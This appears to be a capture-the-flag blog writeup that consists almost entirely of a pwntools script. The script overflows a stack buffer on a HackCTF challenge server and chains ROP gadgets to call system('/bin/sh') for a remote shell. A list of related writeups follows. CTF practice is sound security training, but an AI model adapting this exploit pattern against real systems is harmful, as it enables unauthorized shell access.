Exploit Code

from pwn import *
#p=process('./exploit')
p=remote('ctf.j0n9hyun.xyz', 3023)
system_plt = 0x400560
binsh = 0x4003bf
pop_rdi = 0x4007d3

ret = 0x400541

payload = 'A'*0x18
payload += p64(ret)+p64(pop_rdi)+p64(binsh)
payload += p64(system_plt)

pause()
p.sendlineafter('\n', payload)
p.interactive()

'Writeup [pwn] > HackCTF' 카테고리의 다른 글

World Best Encryption Tool  (0) 2020.03.07
RTL_Core  (0) 2020.03.07
ROP  (0) 2020.03.07
Beginner_Heap  (0) 2020.03.07
babyheap  (0) 2020.03.07

+ Recent posts

티스토리툴바